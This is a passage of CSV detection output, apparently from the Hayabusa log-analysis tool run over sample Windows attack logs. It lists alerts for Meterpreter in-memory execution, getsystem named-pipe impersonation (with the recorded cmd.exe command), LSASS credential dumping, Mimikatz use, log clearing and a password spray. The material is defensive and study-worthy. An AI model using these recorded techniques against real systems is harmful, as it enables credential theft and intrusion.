Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:thessman/edygert/rbowes/jwright/celgee/ebooth/cmoody/tbennett/melliott/jlake/cfleener/psmith/drook/dpendolino/Administrator/wstrzelec/mdouglas/cspizor/cragoso/bhostetler/jleytevidal/sarmstrong/baker/gsalinas/lschifano/cdavis/jorchilles/bking/ssims/zmathis/econrad/smisenar/eskoudis/mtoussain/dmashburn/kperryman/jkulikowski/bgreenwood/lpesce/sanson/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : 